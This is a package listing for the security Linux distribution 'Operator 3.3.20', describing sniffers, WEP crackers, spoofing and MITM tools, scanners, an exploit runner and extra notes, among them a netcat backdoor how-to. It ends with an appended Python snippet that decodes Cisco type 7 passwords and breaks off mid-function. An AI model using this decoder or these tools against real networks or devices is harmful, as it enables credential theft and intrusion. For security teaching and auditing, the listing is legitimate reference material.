Tools Listing

Operator 3.3.20

Command Line Tools

Package  Version  Description

aircrack 2.1-2
          Description: wireless WEP cracker
 aircrack is an 802.11 WEP cracking program that can recover a 40-bit
 or 104-bit WEP key once enough encrypted packets have been gathered.
 It implements the standard FMS attack along with some optimizations,
 thus making the attack much faster compared to other WEP cracking tools.

	  
arping 2.01-3
          Description: sends IP and/or ARP pings (to the MAC address)
 The arping utility sends ARP and/or ICMP requests to the specified host
 and displays the replies. The host may be specified by its hostname,
 its IP address, or its MAC address.
 .
 This program is only able to run as root. Make it setuid if you like.

	  
bing 1.1.3-1
          Description: Empirical stochastic bandwidth tester
 Bing is a point-to-point bandwidth measurement tool (hence the 'b'),
 based on ping.
 .
 Bing determines the real (raw, as opposed to available or average)
 throughput on a link by measuring ICMP echo requests' round trip times
 for different packet sizes at each end of the link.
 .
 Website: http://fgouget.free.fr/bing/bing_src-readme-1st.shtml

	  
bridge-utils 1.0.6-1
          Description: Utilities for configuring the Linux ethernet bridge
 This package contains utilities for configuring the Linux ethernet
 bridge in Linux 2.4 or later. The Linux ethernet bridge can be used
 for connecting multiple ethernet devices together. The connecting is
 fully transparent: hosts connected to one ethernet device see hosts
 connected to the other ethernet devices directly.

	  
chntpw 0.99.2-040105-1
          Description: NT SAM password recovery utility
 This little program provides a way to view information and
 change user passwords in a Windows NT/2000 user database file.
 Old passwords need not be known since they are overwritten.
 In addition it also contains a simple registry editor
 (same size data writes) and a hex-editor which enables you to
 fiddle around with bits and bytes in the file as you wish.
 .
 If you want GNU/Linux bootdisks for offline password recovery
 you can add this utility to custom image disks or use those provided
 at the tools homepage.
 .
 Homepage: http://home.eunet.no/~pnordahl/ntpasswd/

	  
cryptcat N/A
          N/A
	  
dlint 1.4.0-4
          Description: Checks dns zone information using nameserver lookups
 This program analyzes any DNS zone you specify, and reports any problems it
 finds by displaying errors and warnings.  Then it descends recursively to
 examine all zones below the given one (this can be disabled with a
 command-line option).
 .
 You don't have to feed any BIND conffiles to Dlint. Dlint uses
 nameserver calls to gather information.
 .
 Designed for Unix, dlint is written in Bourne Shell and Perl.
 .
 You may try it online at http://www.domtools.com/dns/dlint.shtml
 (this server imposes a timeout period; to lint a big zone, you should
 install dlint yourself and use it locally - that's what this package is for).

	  
dsniff 2.4b1-12
          Description: Various tools to sniff network traffic for cleartext insecurities
 This package contains several tools to listen to and create network traffic:
 .
  * arpspoof - Send out unrequested (and possibly forged) arp replies.
  * dnsspoof - forge replies to arbitrary DNS address / pointer queries
               on the Local Area Network.
  * dsniff - password sniffer for several protocols.
  * filesnarf - saves selected files sniffed from NFS traffic.
  * macof - flood the local network with random MAC addresses.
  * mailsnarf - sniffs mail on the LAN and stores it in mbox format.
  * msgsnarf - record selected messages from different Instant Messengers.
  * sshmitm - SSH monkey-in-the-middle; proxies and sniffs SSH traffic.
  * sshow - SSH traffic analyser
  * tcpkill - kills specified in-progress TCP connections.
  * tcpnice - slow down specified TCP connections via "active"
              traffic shaping.
  * urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
  * webmitm - HTTP / HTTPS monkey-in-the-middle; transparently proxies.
  * webspy - sends URLs sniffed from a client to your local browser.
 .
 Please do not abuse this software.

	  
etherwake 1.09-1
          Description: A little tool to send magic Wake-on-LAN packets
 You can wake up WOL-compliant computers that have been powered down to
 sleep mode, or start WOL-compliant computers using a BIOS feature.
 .
 WOL is an abbreviation for Wake-on-LAN. It is a standard that allows you
 to turn on a computer from another location over a network connection.
 .
 etherwake also supports WOL passwords.

	  
fping 2.4b2-to-ipv6-11
          Description: sends ICMP ECHO_REQUEST packets to network hosts
 fping is a ping like program which uses the Internet Control Message Protocol
 (ICMP) echo request to determine if a target host is responding.  fping
 differs from ping in that you can specify any number of targets on the command
 line, or specify a file containing the lists of targets to ping.  Instead of
 sending to one target until it times out or replies, fping will send out a
 ping packet and move on to the next target in a round-robin fashion.
 .
 Homepage: http://www.fping.com/

	  
fragrouter 1.6-2.2
          Description: Test a NIDS by attempting to evade using fragmented packets
 Fragrouter is aimed at testing the correctness of a NIDS, according
 to the specific TCP/IP attacks listed in the Secure Networks NIDS
 evasion paper, "Insertion, Evasion, and Denial of Service: Eluding
 Network Intrusion Detection."  It does this by routing network
 traffic in such a way as to elude most network intrusion detection
 systems.

	  
gq 1.0beta1-4
          Description: GTK-based LDAP client
 GQ is a GTK+ LDAP client and browser utility. It can be used
 for searching an LDAP directory as well as browsing it using a
 tree view. Features include:
  - browse and search modes
  - LDAPv3 schema browser
  - edit and delete entries
  - add entries with templates
  - export subtree or whole server to LDIF file
  - use any number of servers
  - search based on single argument or LDAP filter
  - TLS support for LDAPv3
  - SASL support
  - Support for userPassword including SSHA and SMD5 encryption.
  - I18N support
  - Support for graphical jpegPhoto display
  - Support to view X509 certificates and X509 certificate revocation
    lists (CRLs)

	  
honeyd 1.0a-rc2-1
          Description: Honeyd's honeypot documentation and scripts
 Honeyd is a small daemon that creates virtual hosts on a network,
 including OS fingerprinting personalities and services that are
 simulated by scripts.
 .
 This package provides honeyd's documentation and a number of scripts
 useful to simulate services of different UNIX and Windows operating
 systems: smtp, pop3, ftp, telnet, web server, ssh...
 .
 Homepage: http://www.honeyd.org

	  
hping2 2.rc3-3
          Description: Active Network Smashing Tool
 hping2 is a network tool able to send custom ICMP/UDP/TCP packets and
 to display target replies like ping does with ICMP replies. It handles
 fragmentation and arbitrary packet body and size, and can be used to
 transfer files under supported protocols. Using hping2, you can test
 firewall rules, perform (spoofed) port scanning, test network
 performance using different protocols, do path MTU discovery, perform
 traceroute-like actions under different protocols, fingerprint remote
 operating systems, audit TCP/IP stacks, etc.
 .
 Homepage: http://www.hping.org/

	  
httptunnel 3.3-2
          Description: Tunnels a data stream in HTTP requests.
 Creates a bidirectional virtual data stream tunnelled in
 HTTP requests. The requests can be sent via a HTTP proxy
 if so desired.

	  
hunt 1.5-4
          Description: Advanced packet sniffer and connection intrusion
 Hunt is a program for intruding into a connection, watching it and
 resetting it.
 .
 Note that as hunt operates on Ethernet, it is best used for connections
 which can be watched through it. However, it is possible to do something
 even for hosts on other segments or hosts that are on switched ports.

	  
icmpinfo 1.11-5
          Description: Interpret ICMP messages
 Icmpinfo is a tool for looking at the ICMP messages received on the running
 host.  It can be used to detect and record 'bombs' as well as various network
 problems.

	  
icmpush 2.2-6
          Description: ICMP packet builder
 icmpush is a tool that builds ICMP packets fully customized
 from command line.
 .
 It supports the following ICMP error types: Redirect, Source
 Quench, Time Exceeded, Destination Unreach and Parameter
 Problem.
 .
 And the following ICMP information types: Address Mask Request,
 Timestamp, Information Request, Echo Request, Router Solicitation
 and Router Advertisement.

	  
idswakeup 1.0-3
          Description: A tool for testing network intrusion detection systems.
 idswakeup is a Bourne shell script invoking hping2 (required) and iwu
 (part of this package) to generate false alarms in order to check if
 a network intrusion detection system works all right.
 .
 idswakeup requires no configuration and includes many common attack
 simulations.

	  
ipgrab 0.9.9-1
          Description: Tcpdump-like utility that prints detailed header information
 Ipgrab is a network debugging utility not unlike tcpdump except
 that it prints out detailed header field information for
 data link, network and transport layers.

	  
ipsc 0.4.3-2
          Description: IP Subnet Calculator for console
 The IP Subnet Calculator is a tool that allows network administrators
 to make calculations that will assist in subnetting a network.  You
 give the network class and subnet bits and you get back the maximum
 number of subnets, maximum number of hosts per subnet, a bitmap showing
 the breakdown of network bits, subnet bits, and host bits, the decimal
 and hexadecimal class netmask, the decimal and hexadecimal subnet mask,
 and lists of subnets and host information. It also supports CIDR and can
 reverse-engineer the network information for a particular interface
 (e.g. eth0, ppp0).

	  
iptables 1.3.3-2
          Description: Linux kernel 2.4+ iptables administration tools
 netfilter and iptables provide a Linux kernel framework for
 stateful and stateless packet filtering, network and port address
 translation, and other IP packet manipulation. The framework is the
 successor to ipchains.
 .
 netfilter and iptables are used in applications such as Internet
 connection sharing, firewalls, IP accounting, transparent proxying,
 advanced routing and traffic control.
 .
 iptables web site: http://www.iptables.org/

	  
lisa 4:3.3.2-5
          Description: LAN Information Server
 KDE is a powerful Open Source graphical desktop environment for Unix
 workstations. It combines ease of use, contemporary functionality, and
 outstanding graphical design with the technological superiority of the Unix
 operating system.
 .
 LISa is intended to provide a kind of "network neighborhood" but only relying
 on the TCP/IP protocol stack, no smb or whatever.
 .
 This package is part of the official KDE network module.

	  
nemesis 1.32+1.4beta3-2
          Description: TCP/IP Packet Injection Suite
 The Nemesis Project is designed to be a commandline-based, portable
 human IP stack for UNIX/Linux.  The suite is broken down by protocol
 and should allow for useful scripting of injected packet streams from
 simple shell scripts.
 .
 Key features:
  * support for ARP, DNS, ICMP, IGMP, OSPF, RIP, TCP, UDP protocols
  * layer 2 or layer 3 injection
  * packet payload from file
 .
 Homepage: http://www.packetfactory.net/Projects/nemesis/

	  
netdiag 0.7-7.1
          Description: Net-Diagnostics (trafshow,strobe,netwatch,statnet,tcpspray,tcpblast)
 Netdiag contains a collection of small tools to analyze network traffic and
 configuration of remote hosts. It is of invaluable help if your
 system is showing strange network behaviour and you want to find out what
 your network is doing. The included tools are tcpblast, netload, trafshow,
 netwatch, strobe, statnet, and tcpspray.

	  
netpipes 4.2-3
          Description: a package to manipulate BSD TCP/IP stream sockets
 NETPIPES 4 by Robert Forsman
 The netpipes package makes TCP/IP streams usable in shell
 scripts. It can also simplify client/server code by
 allowing the programmer to skip all the tedious programming
 bits related to sockets and concentrate on writing a
 filter/service.

	  
ngrep 1.44-1
          Description: grep for network traffic
 ngrep strives to provide most of GNU grep's common features,
 applying them to the network layer.  ngrep is a pcap-aware tool that
 will allow you to specify extended regular expressions to match
 against data payloads of packets.  It currently recognizes TCP, UDP
 and ICMP across Ethernet, PPP, SLIP and null interfaces, and
 understands bpf filter logic in the same fashion as more common
 packet sniffing tools, such as tcpdump and snoop.

	  
nikto 1.34-1
          Description: web server security scanner
 Nikto is a pluggable web server and CGI scanner written in Perl, using
 rfp's LibWhisker to perform fast security or informational checks.
 .
 Features:
  * Easily updatable CSV-format checks database
  * Output reports in plain text or HTML
  * Available HTTP versions automatic switching
  * Generic as well as specific server software checks
  * SSL support (through libnet-ssleay-perl)
  * Proxy support (with authentication)
  * Cookies support

	  
nload 0.6.0-2
          Description: A realtime console network usage monitor
 Nload is a console application which monitors network traffic and bandwidth
 usage in real time. It displays the total amount of data that has been
 transferred over a network device since the last reboot, the current bandwidth
 usage, and the minimum, maximum, and average bandwidth usage measured
 since it started.
 .
 If the user wants, it is also able to display two bars, similar to progress
 bars, presenting the current load graphically. Support for displaying several
 devices simultaneously is included.

	  
nmap 3.93-1
          Description: The Network Mapper Front End
 nmapfe provides an X Window System (GTK+) front end for nmap.
 Written by Zach Smith, nmapfe is now maintained by Fyodor.

	  
openvpn 2.0.2-1
          Description: Virtual Private Network daemon
 An application to securely tunnel IP networks over a single UDP or TCP port.
 It can be used to access remote sites, make secure point-to-point connections,
 enhance WiFi security, etc.
 .
 OpenVPN uses all of the encryption, authentication, and certification features
 of the OpenSSL library (any cipher, key size, or HMAC digest).
 .
 OpenVPN may use static, pre-shared keys or TLS-based dynamic key exchange.  It
 also supports VPNs with dynamic endpoints (DHCP or dial-up clients), tunnels
 over NAT or connection-oriented stateful firewalls (like Linux's iptables).

	  
paketto 1.10-6
          Description: Unusual TCP/IP testing tools
 The Paketto Keiretsu is a collection of tools that use new and unusual
 strategies for manipulating TCP/IP networks. scanrand is said to be
 faster than nmap and more useful in some scenarios.
 .
 This package includes:
   * scanrand, a very fast port, host, and network trace scanner
   * minewt, a user space NAT/MAT (MAC Address Translation) gateway
   * linkcat(lc), that provides direct access to the network (Level 2)
   * paratrace, a "traceroute"-like tool using existing TCP connections
   * phentropy, that plots a large data source onto a 3D matrix

	  
pchar 1.4-4
          Description: Characterize the bandwidth, latency and loss on network links
 pchar is a reimplementation of the pathchar utility, written by Van
 Jacobson.  Both programs attempt to characterize the bandwidth,
 latency, and loss of links along an end-to-end path through the
 Internet.  pchar works in both IPv4 and IPv6 networks.

	  
prips 0.9.4-3
          Description: Print IP address on a given range
 prips can be used to print all IP addresses of a specified range.
 This allows the enhancement of the usability of tools that have been
 created to work on only one host at a time (e.g. whois).

	  
queso N/A
          N/A
	  
raccess 0.7-2
          Description: Security Tool to audit remote systems
 Remote Access Session is a security tool to analyze the integrity of
 systems. The program tries to gain access to a system using the most
 advanced techniques of remote intrusion. It can work in normal mode
 (fast) or hard mode (more intensive). There is a big difference between
 "Remote Access Session" and other remote security audit tools: if
 "Remote Access Session" finds a remote vulnerability that gives a user account
 or root, it will try to exploit it and return a shell in order to
 discard false positives.
 .
 It is currently under development and has only a few features of the
 future final version:
  * Advanced scanning capabilities. This tool is not blocked by
    firewalls and it's fast.
  * Total service banner info added: includes web server detection
    version and named version, and the classical ones too (ftp, pop ...)
  * Writes reports with info on the analyzed host to the hard disk.
  * Remote OS detection feature with QueSO.
  * If it detects any vulnerability, the tool chooses the right exploits
    based on version, vendor and OS of the services that run on the
    remote host and asks you interactively whether you want to run
    these exploits in order to check the real danger the remote host
    can receive and discard false positives. Includes 69 remote exploits
    for various OS and services.

	  
rain 1.2.9beta1-1
          Description: packet builder for testing IP protocol implementations.
 rain is a powerful packet builder for testing stability of hardware
 and software utilizing IP protocols. It offers its users the
 capability of fully customizing their own packets with a wide variety
 of command line options.

	  
scanssh 2.0-4
          Description: get SSH server versions for an entire network
 The ScanSSH protocol scanner scans a list of addresses and networks for
 running SSH protocol servers and their version numbers.  Version 2.0 adds
 support for scanning arbitrary ports and specifically open proxies.  The
 ScanSSH protocol scanner supports random selection of IP addresses from
 large network ranges and is useful for gathering statistics on the
 deployment of SSH protocol servers in a company or the Internet as a whole.

	  
scli 0.2.12-2
          Description: a collection of SNMP command line management tools
 The scli package was written in order to have a small and efficient command
 line utility to monitor and configure network devices and host systems. The
 scli package is based on the SNMP management protocol and it utilizes a
 MIB compiler called smidump to generate C stub code. In fact, virtually no
 SNMP knowledge is required in order to extend the scli programs with new
 features.
 .
 In other words, the slogan for this little package is:
 .
  "After more than 10 years of SNMP, I felt it is time for really useful
   command line SNMP monitoring and configuration tools. ;-)"
 .
 (description taken from upstream sources)
 .
 scli replaces the stools package

	  
sendip 2.5-2
          Description: A commandline tool to allow sending arbitrary IP packets
 SendIP has a large number of command line options to specify the
 content of every header of a RIP, TCP, UDP, ICMP or raw IPv4 and IPv6
 packet. It also allows any data to be added to the packet. Checksums
 can be calculated automatically, but if you wish to send out wrong
 checksums, that is supported too.

	  
sing 1.1-9
          Description: A fully programmable ping replacement
 Sing is a little tool that sends ICMP packets fully customized from the command
 line. The main purpose is to replace/complement the nice ping command
 with certain enhancements such as:
  - Send fragmented packets (Linux and BSD).
  - Send monster packets > 65534 (Linux and BSD).
  - Send/read spoofed packets (libpcap included in distribution).
  - Send many ICMP information types in addition to the ECHO REQUEST type
    sent by default: Address Mask Request, Timestamp, Information Request,
    Router Solicitation and Router Advertisement.
  - Send many ICMP error types: Redirect, Source Quench, Time Exceeded,
    Destination Unreach and Parameter Problem.
  - Send to host with Loose or Strict Source Routing.
  - Use little fingerprinting techniques to discover Windows or Solaris
    boxes.
  - Send ICMP packets emulating certain OS: Cisco, Solaris, Linux, Shiva,
    Unix and Windows at the moment.

	  
smb-nat 1:1.0-4
          Description: Netbios Auditing Tool
 This tool can perform various security checks on remote
 servers running NetBIOS file sharing services. It
 is capable of enumerating shares and making break-in attempts
 using a (user-provided) list of users and passwords.

	  
smbclient 3.0.14a-6
          Description: a LanManager-like simple client for Unix
 The Samba software suite is a collection of programs that
 implements the SMB protocol for unix systems, allowing you to serve
 files and printers to Windows, NT, OS/2 and DOS clients. This protocol
 is sometimes also referred to as the LanManager or NetBIOS protocol.
 .
 This package contains some client components of the Samba suite. In
 particular it includes the command line utilities smbclient, smbtar,
 and smbspool. If you want to mount shares exported from Microsoft
 Windows machines or a Samba server you must install the smbfs package.

	  
sniffit 0.3.7.beta-11
          Description: packet sniffer and monitoring tool
 sniffit is a packet sniffer for TCP/UDP/ICMP packets.
 sniffit is able to give you very detailed technical info
 on these packets (SEQ, ACK, TTL, Window, ...) but also
 packet contents in different formats (hex or plain text,
 etc.).

	  
snmp 5.1.2-6.1
          Description: NET SNMP (Simple Network Management Protocol) Apps
 The Simple Network Management Protocol (SNMP) provides a framework
 for the exchange of management information between agents (servers)
 and clients.  The NET SNMP applications are a collection of command
 line clients for issuing SNMP requests to agents.

	  
ssldump 0.9b3-2
          Description: An SSLv3/TLS network protocol analyzer
 This program will dump the traffic on a network and analyze it for
 SSLv3/TLS network traffic, typically used to secure TCP connections.
 When it identifies this traffic, it decodes the results.  When
 provided with the appropriate keying material, it will also decrypt
 the connections and display the application data traffic.
 .
 ssldump is based on tcpdump, a network monitoring and data acquisition
 tool.

	  
stunnel 2:3.26-3
          Description: Universal SSL tunnel for network daemons
 The stunnel program is designed to work as an SSL encryption
 wrapper between a remote client and a local (inetd-startable) or
 remote server. The concept is that, having non-SSL aware daemons
 running on your system, you can easily set them up to
 communicate with clients over a secure SSL channel.
 .
 stunnel can be used to add SSL functionality to commonly
 used inetd daemons like POP-2, POP-3 and IMAP servers
 without any changes in the programs' code.

	  
tcpdump 3.9.3-2
          Description: A powerful tool for network monitoring and data acquisition
 This program allows you to dump the traffic on a network. tcpdump
 is able to examine IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS,
 BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other packet
 types.
 .
 It can be used to print out the headers of packets on a network
 interface and filter packets that match a certain expression. You can
 use this tool to track down network problems, to detect "ping attacks"
 or to monitor network activities.
 .
 Further information is available at 

	  
tcpflow 0.21-6
          Description: TCP flow recorder
 tcpflow is a program that captures data transmitted as part of TCP
 connections (flows), and stores the data in a way that is convenient
 for protocol analysis or debugging. A program like 'tcpdump' shows a
 summary of packets seen on the wire, but usually doesn't store the
 data that's actually being transmitted. In contrast, tcpflow
 reconstructs the actual data streams and stores each flow in a
 separate file for later analysis.
 .
 tcpflow understands sequence numbers and will correctly reconstruct
 data streams regardless of retransmissions or out-of-order delivery.
 However, it currently does not understand IP fragments; flows
 containing IP fragments will not be recorded properly.
 .
 tcpflow is based on the LBL Packet Capture Library and therefore
 supports the same rich filtering expressions that programs like
 'tcpdump' support. tcpflow can also rebuild flows from data captured
 with 'tcpdump -w'.

	  
tcpreplay 2.3.3-1
          Description: Tool to replay saved tcpdump files at arbitrary speeds
 Tcpreplay is aimed at testing the performance of a NIDS by
 replaying real background network traffic in which to hide
 attacks. Tcpreplay allows you to control the speed at which the
 traffic is replayed, and can replay arbitrary tcpdump traces. Unlike
 programmatically-generated artificial traffic which doesn't
 exercise the application/protocol inspection that a NIDS performs,
 and doesn't reproduce the real-world anomalies that appear on
 production networks (asymmetric routes, traffic bursts/lulls,
 fragmentation, retransmissions, etc.), tcpreplay allows for exact
 replication of real traffic seen on real networks.
 .
 https://sf.net/projects/tcpreplay/
 http://tcpreplay.sourceforge.net/

	  
tcpslice 1.2a2-4
          Description: extract pieces of and/or glue together tcpdump files
 Tcpslice is a program for extracting portions of packet-trace files
 generated using tcpdump(1)'s -w flag.
 It can also be used to glue together several such files.

	  
tcpspy 1.7d-3
          Description: Incoming and Outgoing TCP/IP connections logger
 tcpspy is an administrator's tool that logs information
 about incoming and outgoing TCP/IP connections. It's
 written in C and uses no libpcap functions, unlike tcpdump.
 .
 Connections are selected for logging with rules, similarly
 to the filter expressions accepted by tcpdump. The
 following information is logged: username, local address
 and port, remote address and port, and, optionally, the
 executable filename.
 .
 At present, only the IPv4 protocol is supported.
 .
 The current URL for this project is
 http://the.wiretapped.net/security/network-monitoring/tcpspy/

	  
telnet-ssl 0.17.24+0.1-7.1
          Description: The telnet client with SSL encryption support
 The telnet command is used for interactive communication with another host
 using the TELNET protocol.
 .
 SSL telnet(d) replaces normal telnet(d) using SSL authentication and
 encryption. It interoperates with normal telnet(d) in both directions.
 It checks if the other side is also talking SSL, if not it falls back
 to normal telnet protocol.
 .
 Advantages over normal telnet(d): Your passwords and the data you send
 will not go in cleartext over the line. Nobody can get it with
 tcpdump or similar tools. With SSLtelnet you can also connect to
 https-server like https://www.netscape.com. Just do
 'telnet www.netscape.com 443'

	  
tethereal 0.10.12-4
          Description: network traffic analyzer (console)
 Ethereal is a network traffic analyzer, or "sniffer", for Unix and
 Unix-like operating systems. A sniffer is a tool used to capture
 packets off the wire. Ethereal decodes numerous protocols (too many
 to list).
 .
 This package provides the console version of ethereal, named
 "tethereal".

	  
tsocks 1.8beta5-2
          Description: transparent network access through a SOCKS 4 or 5 proxy
 tsocks provides transparent network access through a SOCKS version 4
 or 5 proxy (usually on a firewall). tsocks intercepts the calls
 applications make to establish TCP connections and transparently
 proxies them as necessary. This allows existing applications to use
 SOCKS without recompilation or modification.

	  
udptunnel 1.1-1
          Description: Tunnel UDP packets over a TCP connection
 UDPTunnel is a small program which can tunnel UDP packets
 bi-directionally over a TCP connection. Its primary purpose (and
 original motivation) is to allow multi-media conferences to traverse
 a firewall which allows only outgoing TCP connections.

	  
whisker 1.4-5
          Description: CGI scanner to audit web servers
 Whisker is a state-of-the-art CGI scanner that can:
   - detect the running web server and perform only tests specific
     to that server and version
   - apply intrusion detection evasion methods
   - do brute force on accounts using HTTP-AUTH
   - use virtual hosts
   - run in multi-thread mode
 .
 It can output the information in different formats including
 HTML and nmap.

	  
xprobe 0.3-1
          Description: Remote OS identification
 Xprobe2 allows you to determine what operating system is running on a
 remote host. It sends several packets to a host and analyses the
 returned answers.
 .
 Xprobe2's functionality is comparable to the OS fingerprinting feature
 in nmap (written by a different Fyodor):
  - Outputs its level of confidence about the OS on the remote host.
  - Remains usable even if intermediate systems (routers, firewalls) make
    slight modifications to the packets.
  - Can list the type of intermediate device (e.g. "Linux IP masquerading").
  - Modular architecture allows new fingerprinting tests and new OS
    signatures to be added.
 .
 Project homepage: 

GUI Based Tools
These tools can be selected from the OPERATOR menu within KDE.

Package  Version  Description

airsnort 0.2.7e-1
          Description: WLAN sniffer
 A wireless LAN (WLAN) tool which cracks encryption keys on
 802.11b WEP networks. AirSnort operates by passively monitoring
 transmissions, computing the encryption key when enough packets
 have been gathered.
 .
 http://airsnort.shmoo.com/
 .
 https://sf.net/projects/airsnort/

          
cheops 0.61-12
          Description: Network swiss army knife
 Cheops is a combination of a variety of network tools to
 provide system administrators and users with a simple interface to
 managing and accessing their networks.  Cheops aims to
 do for the network what the file manager did for the filesystem.
 .
 Additionally, cheops has taken on the role of a network management system,
 in the same category as one might put HP Openview.
 .
 Homepage: http://www.marko.net/cheops/

          
etherape 0.9.0-9
          Description: graphical network monitor modeled after etherman
 EtherApe is an etherman clone. It displays network activity
 graphically. Active hosts are shown as circles of varying size,
 and traffic among them is shown as lines of varying width. It's
 Gnome and libpcap based.

          
ethereal 0.10.12-4
          Description: network traffic analyser (common files)
 Ethereal is a network traffic analyzer, or "sniffer", for Unix and
 Unix-like operating systems. A sniffer is a tool used to capture
 packets off the wire. Ethereal decodes numerous protocols (too many
 to list).
 .
 This package provides files common to both ethereal (the GTK+ version)
 and tethereal (the console version).

          
gq 1.0beta1-4
          Description: GTK-based LDAP client
 GQ is a GTK+ LDAP client and browser utility. It can be used
 for searching an LDAP directory as well as browsing it using a
 tree view. Features include:
  - browse and search modes
  - LDAPv3 schema browser
  - edit and delete entries
  - add entries with templates
  - export subtree or whole server to LDIF file
  - use any number of servers
  - search based on single argument or LDAP filter
  - TLS support for LDAPv3
  - SASL support
  - Support for userPassword including SSHA and SMD5 encryption.
  - I18N support
  - Support for graphical jpegPhoto display
  - Support to to view X509 certificates and X509 certificate revocation
    lists (CRLs)

          
httptunnel 3.3-2
          Description: Tunnels a data stream in HTTP requests.
 Creates a bidirectional virtual data stream tunnelled in
 HTTP requests. The requests can be sent via a HTTP proxy
 if so desired.

          
iptraf 2.7.0-8
          Description: Interactive Colorful IP LAN Monitor
 IPTraf is an ncurses-based IP LAN monitor that generates
 various network statistics including TCP info, UDP counts,
 ICMP and OSPF information, Ethernet load info, node stats,
 IP checksum errors, and others.

          
krdc 4:3.3.2-5
          Description: KDE Remote Desktop Client
 KDE is a powerful Open Source graphical desktop environment for Unix
 workstations. It combines ease of use, contemporary functionality, and
 outstanding graphical design with the technological superiority of the Unix
 operating system.
 .
 krdc is an KDE graphical client for the rfb Protocol, used by VNC,
 and if rdesktop is installed, krdc can connect to Windows Terminal
 Servers using RDP.
 .
 This package is part of the official KDE network module.

          
linneighborhood 0.6.5-3.1
          Description: An SMB network browser for Linux and X11.
 This package allows users to browse SMB (e.g. Windows Network Neighborhood)
 networks under X, and mount/unmount SMB shared filesystems via a graphical
 interface.  It is somewhat more network-efficient than other similar tools
 because it uses the proper protocol for identifying network shares rather
 than simply scanning IP address ranges.
 .
 In order for LinNeighborhood to work properly,  you must have the
 smbfs filesystem compiled into your kernel and have a working Samba
 setup.

          
mtr 0.69-2
          Description: Full screen ncurses and X11 traceroute tool
 mtr combines the functionality of the 'traceroute' and 'ping' programs
 in a single network diagnostic tool.
 .
 As mtr starts, it investigates the network connection between the host
 mtr runs on and a user-specified destination host.  After it
 determines the address of each network hop between the machines,
 it sends a sequence of ICMP ECHO requests to each one to determine the
 quality of the link to each machine.  As it does this, it prints
 running statistics about each machine.

          
nessus 2.2.5-1
          Description: Remote network security auditor, the server
 The Nessus Security Scanner is a security auditing tool. It makes it
 possible to test security modules in an attempt to find vulnerable
 spots that should be fixed.
 .
 It is made up of two parts: a server, and a client. The server/daemon,
 nessusd, is in charge of the attacks, whereas the client, nessus,
 provides the user a nice X11/GTK+ interface.
 .
 This package contains the nessusd server, which must be run as root.

          
netdude 0.3.3-2
          Description: NETwork DUmp data Displayer and Editor for tcpdump trace files
 It is a GUI-based tool that allows you to make detailed changes to
 packets in tcpdump trace files, in particular, it can currently do
 the following:
  * Set the value of any field in IP, TCP and UDP packet headers.
  * Copy, move and delete packets in the trace file.
  * Fragment and reassemble IP packets.
  * Netdude constantly communicates with a tcpdump process to update
    the familiar tcpdump output that corresponds to the trace. This
    also means that any changes made to your local version of tcpdump
    are reflected in Netdude.
  * Plugin architecture: people can easily add plugins for specific
    tasks. The code comes with a plugin for checksum correction in IP,
    TCP and UDP, and a dummy plugin.
  * Through the plugin mechanism, Netdude provides a good facility for
    writing tcpdump trace file filters.
  .
  http://netdude.sourceforge.net/

          
nmapfe 3.93-1
          Description: The Network Mapper Front End
 nmapfe provides an X Window System (GTK+) front end for nmap.
 Written by Zach Smith, nmapfe is now maintained by Fyodor.

          
wavemon 0.4.0b-8
          Description: Wireless Device Monitoring Application
 Wavemon allows you to watch signal and noise levels, packet
 statistics, device configuration and network parameters of your
 wireless network hardware.  It has currently only been tested with
 the Lucent Orinoco series of cards, although it *should* work (though
 with varying features) with all devices supported by the wireless
 kernel extensions by Jean Tourrilhes.

          
xsmbrowser 3.4.0-12
          Description: X11 tool for navigating SMB Networks
 xSMBrowser is a tool for navigating SMB Networks (Samba, SMB, CIFS).
 It retains the features of the program it was based upon (Microsoft's
 Network Neighborhood), but adds convenient features for Unix users.
 These include mounting, ability to change networks on-the-fly, and
 conveniences such as a Stop Button.
 .
 More information can be found at the xsmbrowser web site
 http://www.public.iastate.edu/~chadspen/ .

          
     
 
Extra
These are an assortment of exploits and tools acquired that you may like.
They are located in the /opt/Operator_Extras/ directory. Note: the Windows applications require wine.

Package

Version

Description

Notes/Notes N/A
Package Directory: /opt/Operator_Extras/Notes


Just some text and html files containing some how-to's and notes.
Directory Listing:

Firewalk-hping
	Discussion on using the firewalk utility. How you can further
	test your firewall rulebase.
firewalk-final_old.html
	Firewalk documentation
dcomrpc_notes
netcat.htm
	Netcat documentation
netcat_backdoor
	How to use netcat as a back door into a system
netcat_readme.txt
	Just that
netcat_and_cryptcat.pdf
	Good pdf on using the products
BGP-Vulnerability-Testing.html
	Just that
NTFS.txt
	Notes on using some of the installed tools to access Windows
	filesystems, change NT passwords and modify the registry.
operator_notes
	Miscellaneous notes regarding operator
hostap_README
	Just that
        
Tools/misc N/A
Package Directory: /opt/Operator_Extras/Tools/misc


Directory of miscellaneous goods:

CGen.sh
	CGen.sh v0.1 by J. Barber
	simple little script that prints out a class C IP range
freemem
	Simple util to reclaim unused memory

hijack_rst.sh
	shell script using nemesis to send TCP resets

shroud.sh
	This script responds to SYN requests by sending a crafted SYN/ACK
	response packet back using nemesis, which makes nmap -sS scans
	report all ports open.
	Haven't got this to work right

shroud2.sh
 	Same as shroud.sh but will send a banner back to the connection.
	Haven't got this to work right

Kreset.pl
	Used to reset a TCP connection
	(using the slipping-in-the-window method described on 4-20-04)

dos2unix.pl
	Simple perl script to convert files from DOS to Unix format

ciscocrack
	Decrypts type 7 encrypted Cisco passwords.

PSTArpsniffer
	ARP sniffer
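The type 7 scheme that ciscocrack reverses is a fixed-key XOR, which this added example (not ciscocrack's own code) implements end to end: a decoder, its inverse, and a scan over a constructed IOS config fragment. The hostname, the config lines and the `enable secret` hash are made up for the example; the key constant is the publicly documented IOS one.

```python
import re

# Added example, not ciscocrack's code: the IOS "type 7" scheme is a fixed
# XOR keystream, so recovery is instant.  KEY is the publicly documented
# IOS constant.
KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def type7_decode(encoded: str) -> str:
    """Decode a type 7 string: two decimal digits of seed, then hex bytes,
    each XORed with KEY[(seed + i) % len(KEY)]."""
    encoded = encoded.strip()
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError("expected a 2-digit seed followed by an even number of hex digits")
    seed = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    return bytes(b ^ KEY[(seed + i) % len(KEY)] for i, b in enumerate(body)).decode()


def type7_encode(plaintext: str, seed: int = 8) -> str:
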